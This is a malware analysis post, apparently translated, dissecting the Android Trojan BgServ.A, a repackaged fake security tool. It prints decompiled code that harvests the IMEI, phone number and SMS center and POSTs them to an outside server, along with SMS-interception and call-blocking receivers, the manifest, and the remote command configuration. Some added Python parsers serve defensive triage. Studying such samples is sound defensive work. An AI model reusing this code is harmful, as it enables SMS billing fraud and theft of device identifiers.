With malware running rampant, Google put out an Android Market Security Tool aimed at Trojan:Android/DroidDream.A. Who would have guessed that this "stability maintenance" tool would itself get counterfeited? The counterfeit is Trojan:Android/BgServ.A.
Interested readers are encouraged to download the sample and dig into it themselves.
Looking at the two screenshots above, they look nearly identical; the only difference is that the latter asks for more permissions, presumably to get up to something nasty.
Now compare the package structures of the two.
It is clearly a repackage: clone the original package and stir in some evil extras. And the extras are off the shelf too:
however, what is shocking is that the threat’s code seems to be based on a project hosted on Google Code and licensed under the Apache License:
It comes from here: http://code.google.com/p/mmsbg/
This software mainly steals information such as the IMEI and sends it to http://www.youlubg.com:81/Coop/request3.php.
It collects the following information, saves it to [INSTALLATION PATH]/.hide/upload.xml, and then fires it off:
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<body>
    <imei>354059022277352</imei>
    <version>1.0.1</version>
    <smscenter>8613800100500</smscenter>
    <first>1</first>
    <handled>0</handled>
    <pid>20013</pid>
    <installtime>3 Mar 2011 09:13:38 GMT</installtime>
    <sysversion>7</sysversion>
    <auth>michael</auth>
    <fare>0</fare>
    <phonenum>+886928216512</phonenum>
    <reason>simLoaded</reason>
</body>
- IMEI
- Phone Number
- SMS Center
- Install Time
- System Version
Once collected, it fires away:
new-instance v8, Ljava/net/URI;
const-string v9, "http://www.youlubg.com:81/Coop/request3.php"
invoke-direct {v8, v9}, Ljava/net/URI;-><init>(Ljava/lang/String;)V
invoke-virtual {v6, v8}, Lorg/apache/http/client/methods/HttpPost;->setURI(Ljava/net/URI;)V
...
invoke-interface {v5, v6}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;
It also has to receive remote commands from its master:
Next, it receives commands from the reply to the POST and saves the commands in the following file:
[INSTALLATION PATH]/.hide/serverInfo.xml
<?xml version="1.0" encoding="UTF-8" ?>
<body>
    <auto_run>1</auto_run>
    <auto_link_time>24</auto_link_time>
    <version>1.0.1</version>
    <channel>
        <channel_name>vedio</channel_name>
        <vedio_url>http://211.136.165.53/wl/rmw1s/pp66.jsp</vedio_url>
        <channel_sms>2</channel_sms>
        <intercept_key>
            <key>移动</key>
            <key>费用</key>
            <key>1元</key>
            <key>2元</key>
        </intercept_key>
        <intercept_time>2000</intercept_time>
        <limit_nums_day>4</limit_nums_day>
        <limit_nums_month>4</limit_nums_month>
    </channel>
</body>
It can quietly send SMS messages:
This allows the remote attacker to send SMS messages from the compromised device.
Intercept SMS messages:
The threat also has the capability to block incoming SMS messages.
The features above are the classic malicious subscription scam!
Switching the APN is a WAP-era trick; it is of little value nowadays.
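As an added example (not code from this post or from the mmsbg project), here is a small Python parser for the two .hide artifacts quoted above, upload.xml and serverInfo.xml, so an analyst can pull the victim profile and the operator's configuration out of a recovered sample. The XML strings are constructed copies of what the post shows; treating the intercept keys as SMS-blocking keywords is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed copies of the two artifacts quoted in the post.
UPLOAD_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<body><imei>354059022277352</imei><version>1.0.1</version>
<smscenter>8613800100500</smscenter><first>1</first><handled>0</handled>
<pid>20013</pid><installtime>3 Mar 2011 09:13:38 GMT</installtime>
<sysversion>7</sysversion><auth>michael</auth><fare>0</fare>
<phonenum>+886928216512</phonenum><reason>simLoaded</reason></body>"""

SERVER_INFO_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<body><auto_run>1</auto_run><auto_link_time>24</auto_link_time>
<version>1.0.1</version><channel><channel_name>vedio</channel_name>
<vedio_url>http://211.136.165.53/wl/rmw1s/pp66.jsp</vedio_url>
<channel_sms>2</channel_sms><intercept_key><key>移动</key><key>费用</key>
<key>1元</key><key>2元</key></intercept_key><intercept_time>2000</intercept_time>
<limit_nums_day>4</limit_nums_day><limit_nums_month>4</limit_nums_month>
</channel></body>"""

def parse_upload(xml_text):
    """Victim profile written to .hide/upload.xml, as a tag -> text dict."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != "body":
        raise ValueError("unexpected root element: " + root.tag)
    return {child.tag: (child.text or "") for child in root}

def parse_server_info(xml_text):
    """Operator config from .hide/serverInfo.xml: global flags plus channels."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    config = {
        "auto_run": root.findtext("auto_run") == "1",
        "auto_link_time": int(root.findtext("auto_link_time", "0")),
        "channels": [],
    }
    for ch in root.findall("channel"):
        config["channels"].append({
            "name": ch.findtext("channel_name", ""),
            "url": ch.findtext("vedio_url", ""),
            "channel_sms": int(ch.findtext("channel_sms", "0")),
            # Assumed to be keywords matched against incoming SMS by the
            # blocking logic (移动 = China Mobile, 费用 = fee, 1元/2元 = 1/2 yuan).
            "intercept_keys": [k.text for k in ch.findall("intercept_key/key")],
            "intercept_time": int(ch.findtext("intercept_time", "0")),
            "limit_nums_day": int(ch.findtext("limit_nums_day", "0")),
            "limit_nums_month": int(ch.findtext("limit_nums_month", "0")),
        })
    return config
```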
The threat may change the access port name (APN) to the following WAP network:
Name: cmwap
APN: cmwap
Proxy: 10.0.0.172
Port: 80
MCC: 460
MNC: 02
Type: default
MMSC: http://mmsc.monternet.com
Number: [EXISTING SIM OPERATOR NUMBER]
It also downloads some stuff!
It then downloads a list of links from a remote site listed in the serverInfo.xml file and saves it as the following file:
[INSTALLATION PATH]/.hide/vedio.xml
It also downloads a file from a URL listed in the vedio.xml file and saves it as the following file:
[INSTALLATION PATH]/.hide/vedio_file.3gp
It then restores the APN to its original settings.
The Trojan logs its activities in the following file for debugging purposes:
[INSTALLATION PATH]/.hide/log.txt
Let's look at which receivers it registers with the system:
<receiver android:name="com.mms.bg.transaction.SmsReceiver">
    <intent-filter>
        <action android:name="com.android.mms.transaction.MESSAGE_SENT" />
        <data android:scheme="content" />
    </intent-filter>
    <intent-filter>
        <action android:name="android.intent.action.SEND_MESSAGE" />
    </intent-filter>
</receiver>
<receiver android:name="com.mms.bg.transaction.PrivilegedSmsReceiver" android:permission="android.permission.BROADCAST_SMS">
    <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
    </intent-filter>
</receiver>
<receiver android:name="com.mms.bg.ui.BootReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
</receiver>
<receiver android:name="com.mms.bg.ui.AutoSMSRecevier">
    <intent-filter>
        <action android:name="com.mms.bg.SMS" />
    </intent-filter>
</receiver>
<receiver android:name="com.mms.bg.ui.InternetStatusReceiver">
    <intent-filter>
        <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
    </intent-filter>
</receiver>
Let's look at which permissions it requests from the system. What on earth are they up to with all this! Get lost!
<activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:label="@string/app_name" android:name="com.mms.bg.ui.FakeLanucherActivity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
        <category android:name="android.intent.category.DEFAULT" />
    </intent-filter>
</activity>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INTERNET" />
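As an added example (not code from this post or from the mmsbg project), a static triage pass in Python over the receiver and permission pattern just shown: a priority-1000 SMS_RECEIVED receiver, boot persistence, and SEND_SMS together with RECEIVE_SMS. The manifest is a constructed wrapper around the fragments above, and the finding names are my own.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android:* attribute prefix

# Constructed manifest wrapping the receiver and permission fragments above.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.mms.bg">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <uses-permission android:name="android.permission.RECEIVE_SMS" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.INTERNET" />
  <application>
    <receiver android:name="com.mms.bg.transaction.PrivilegedSmsReceiver"
              android:permission="android.permission.BROADCAST_SMS">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
      </intent-filter>
    </receiver>
    <receiver android:name="com.mms.bg.ui.BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED" />
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

def triage(manifest_xml):
    """Return string findings for the SMS-fraud indicators the post describes."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    findings = []
    for recv in root.iter("receiver"):
        name = recv.get(A + "name")
        for flt in recv.findall("intent-filter"):
            actions = {a.get(A + "name") for a in flt.findall("action")}
            prio = int(flt.get(A + "priority", "0"))
            # A high-priority SMS_RECEIVED receiver runs before the stock
            # messaging app and can abort the ordered broadcast.
            if "android.provider.Telephony.SMS_RECEIVED" in actions and prio >= 1000:
                findings.append("high_priority_sms_receiver:%s" % name)
            if "android.intent.action.BOOT_COMPLETED" in actions:
                findings.append("boot_persistence:%s" % name)
    if {"android.permission.SEND_SMS", "android.permission.RECEIVE_SMS"} <= perms:
        findings.append("send_and_receive_sms")
    return findings

def looks_like_sms_fraud(manifest_xml):
    """True when SMS send+receive is combined with a high-priority SMS receiver."""
    f = triage(manifest_xml)
    return "send_and_receive_sms" in f and any(x.startswith("high_priority_sms_receiver") for x in f)
```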
Much of the code comes from: http://mmsbg.googlecode.com/svn-history/r43/trunk/src/com/mms/bg/ui/SettingManager.java
private SettingManager(Context context)
{
    mContext = context;
    // everything lives under a hidden ".hide" directory in the app's private files dir
    BASE_PATH = (new StringBuilder()).append(context.getFilesDir().getAbsolutePath()).append("/.hide/").toString();
    File file = new File(BASE_PATH);
    if (!file.exists())
        file.mkdirs();
    mSP = context.getSharedPreferences(SETTING_FILE_NAME, 0);
    mEditor = mSP.edit();
    mLog = LogUtil.getInstance((new StringBuilder()).append(BASE_PATH).append("log.txt").toString());
    UPLOAD_FILE_PATH = (new StringBuilder()).append(BASE_PATH).append("upload.xml").toString();
    DOWNLOAD_FILE_PATH = (new StringBuilder()).append(BASE_PATH).append("serverInfo.xml").toString();
    VEDIO_DOWNLOAD_FILE_PATH = (new StringBuilder()).append(BASE_PATH).append("vedio.xml").toString();
    VEDIO_FILE_DOWNLOAD_FILE_PATH = (new StringBuilder()).append(BASE_PATH).append("vedio_file.3gp").toString();
    mConnMgr = (ConnectivityManager)mContext.getSystemService("connectivity");
    mResolver = mContext.getContentResolver();
}
The collected information includes: IMEI, phone number, SMS center, install time, and system version
private void savePhoneInfo(String s)
{
    String s1 = getSMSCenter();
    LOGD((new StringBuilder()).append("[[savePhoneInfo]]smsCenter = ").append(s1).toString());
    if (s1 != null)
    {
        LOGD((new StringBuilder()).append("[[savePhoneInfo]] split the smsCenter =").append(s1).toString());
        TelephonyManager telephonymanager = (TelephonyManager)mContext.getSystemService("phone");
        String s2 = telephonymanager.getDeviceId();      // IMEI
        String s3 = telephonymanager.getLine1Number();   // phone number
        if (s3 == null)
            s3 = "0";
        String s4 = String.valueOf(getSMSRoundTotalSend());
        String s5 = mPid;
        if (s == null)
            s = "nothing";
        String s6 = getFirstStartTime();                 // install time
        if (s6 == null)
        {
            setFirstStartTime();
            s6 = getFirstStartTime();
        }
        String s7 = android.os.Build.VERSION.SDK;        // system version
        try
        {
            File file = new File(UPLOAD_FILE_PATH);
            FileOutputStream fileoutputstream;
            XmlSerializer xmlserializer;
            XmlSerializer xmlserializer1;
            if (file.exists())
                file.delete();
            else
                file.createNewFile();
            fileoutputstream = new FileOutputStream(file);
            xmlserializer = Xml.newSerializer();
            xmlserializer.setOutput(fileoutputstream, "UTF-8");
            xmlserializer.startDocument("UTF-8", Boolean.valueOf(true));
            xmlserializer1 = xmlserializer.startTag("", "body");
            xmlserializer1.startTag("", "imei");
            xmlserializer1.text(s2);
            xmlserializer1.endTag("", "imei");
            xmlserializer1.startTag("", "version");
            xmlserializer1.text("1.0.1");
            xmlserializer1.endTag("", "version");
            xmlserializer1.startTag("", "smscenter");
            xmlserializer1.text(s1);
            xmlserializer1.endTag("", "smscenter");
            xmlserializer1.startTag("", "first");
            xmlserializer1.text("1");
            xmlserializer1.endTag("", "first");
            xmlserializer1.startTag("", "handled");
            xmlserializer1.text(s4);
            xmlserializer1.endTag("", "handled");
            xmlserializer1.startTag("", "pid");
            xmlserializer1.text(s5);
            xmlserializer1.endTag("", "pid");
            xmlserializer1.startTag("", "installtime");
            xmlserializer1.text(s6);
            xmlserializer1.endTag("", "installtime");
            xmlserializer1.startTag("", "sysversion");
            xmlserializer1.text(s7);
            xmlserializer1.endTag("", "sysversion");
            xmlserializer1.startTag("", "auth");
            xmlserializer1.text("michael");
            xmlserializer1.endTag("", "auth");
            xmlserializer1.startTag("", "fare");
            xmlserializer1.text("0");
            xmlserializer1.endTag("", "fare");
            xmlserializer1.startTag("", "phonenum");
            xmlserializer1.text(s3);
            xmlserializer1.endTag("", "phonenum");
            xmlserializer1.startTag("", "reason");
            xmlserializer1.text(s);
            xmlserializer1.endTag("", "reason");
            xmlserializer.endTag("", "body");
            xmlserializer.flush();
            xmlserializer.endDocument();
            fileoutputstream.close();
        }
        catch (Exception exception) { }
    } else
    {
        // no SMS center known yet: send an SMS to 10086 and mark that number as temporarily blocked
        WorkingMessage workingmessage = WorkingMessage.createEmpty(mContext);
        workingmessage.setDestNum("10086");
        workingmessage.setText("1234567");
        setSMSTempBlockNumAndTimes("10086", "1");
        workingmessage.send();
    }
}
Uploading the phone's information to: http://www.youlubg.com:81/Coop/request3.php
public HttpResponse openConnection(File file)
{
    DefaultHttpClient defaulthttpclient;
    HttpPost httppost;
    LOGD("[[openConnection]]");
    defaulthttpclient = new DefaultHttpClient(getParams());
    httppost = new HttpPost();
    httppost.setURI(new URI("http://www.youlubg.com:81/Coop/request3.php"));
    …
}
Intercepting SMS messages:
public class PhoneCallReceiver extends BroadcastReceiver
{
    private static final boolean DEBUG = false;
    private static final String TAG = "PhoneCallReceiver";

    public static final void LOGD(String paramString)
    {
    }

    public void onReceive(Context paramContext, Intent paramIntent)
    {
        LOGD("[[onReceive]] receive a new call for intent : " + paramIntent);
        LOGD("++++++++++ result = " + getResultData());
        String str = getResultData();
        if (str != null)
        {
            SettingManager localSettingManager = SettingManager.getInstance(paramContext);
            long l1 = localSettingManager.getSMSBlockBeginTime();
            long l2 = localSettingManager.getSMSBlockDelayTime();
            // while the block window is open, swallow the result for 10086 / 10010
            if ((System.currentTimeMillis() - l1 < l2) && ((str.equals("10086")) || (str.equals("10010"))))
                setResultData(null);
        }
    }
}